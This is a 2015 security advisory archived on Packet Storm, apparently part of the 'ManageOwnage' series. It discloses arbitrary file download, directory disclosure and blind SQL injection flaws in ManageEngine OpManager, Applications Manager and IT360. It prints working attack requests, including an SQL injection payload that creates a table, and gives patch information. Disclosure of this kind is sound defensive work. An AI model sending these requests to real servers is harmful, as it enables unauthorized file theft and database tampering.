exploit the possibilities

ManageEngine File Download / Content Disclosure / SQL Injection

ManageEngine File Download / Content Disclosure / SQL Injection
Posted Jan 29, 2015
Authored by Pedro Ribeiro

ManageEngine OpManager, Applications Manager, and IT360 suffer from arbitrary file download, directory content disclosure, and blind SQL injection vulnerabilities.

tags | exploit, arbitrary, vulnerability, sql injection, info disclosure
MD5 | 7aea427606c71aefe920fb9e4aecca03

ManageEngine File Download / Content Disclosure / SQL Injection

Change Mirror Download
Hi,

This is part 12 of the ManageOwnage series. For previous parts, see [1].

This time we have an arbitrary file download, directory content
disclosure and blind SQL injection vulnerabilities in ManageEngine
OpManager, Applications Manager and IT360.

I've pushed two new Metasploit modules into the framework that exploit
the file download and the content disclosure [2], these should
hopefully be accepted soon.
The full advisory text is below, and as always you can get a copy from
my repo [3].

Regards,
Pedro

>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 28/01/2014 / Last updated: 28/01/2014

>> Background on the affected products:
"ManageEngine OpManager is a network and data center infrastructure
management software that helps large enterprises, service providers
and SMEs manage their data centers and IT infrastructure efficiently
and cost effectively. Automated workflows, intelligent alerting
engines, configurable discovery rules, and extendable templates enable
IT teams to setup a 24x7 monitoring system within hours of
installation."

"ManageEngine Applications Manager is a comprehensive application
monitoring software used to monitor heterogeneous business
applications such as web applications, application servers, web
servers, databases, network services, systems, virtual systems, cloud
resources, etc. It provides remote business management to the
applications or resources in the network. It is a powerful tool for
system and network administrators, helping them monitor any number of
applications or services running in the network without much manual
effort."

"Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration."


>> Technical details:
The affected servlet is the "FailOverHelperServlet" (affectionately
called FailServlet).
There are definitely more vulnerabilities than the ones identified
below - for example it is possible to hijack the failover operation
completely. The ones listed below as the easy ones to find and
exploit.


#1
Vulnerability: Arbitrary file download
CVE-2014-7863
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini


#2
Vulnerability: Information disclosure - list all files in a directory
and its children
CVE-2014-7863 (same as #1)
Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5

POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\


#3
Vulnerability: Blind SQL injection
CVE-2014-7864
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5
Constraints: unauthenticated in OpManager; authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a


>> Fix:
For Applications Manager, upgrade to version 11.9 b11912.

For OpManager, install the patch for v11.4 and 11.5:
https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet
Version 11.6 will be released with the patch.

These vulnerabilities remain UNFIXED in IT360.


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
http://seclists.org/fulldisclosure/2014/Nov/18
http://seclists.org/fulldisclosure/2014/Nov/21
http://seclists.org/fulldisclosure/2014/Dec/9
http://seclists.org/fulldisclosure/2015/Jan/2
http://seclists.org/fulldisclosure/2015/Jan/5

[2]
https://github.com/rapid7/metasploit-framework/pull/4658
https://github.com/rapid7/metasploit-framework/pull/4659

[3]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    0 Files
  • 3
    Apr 3rd
    0 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close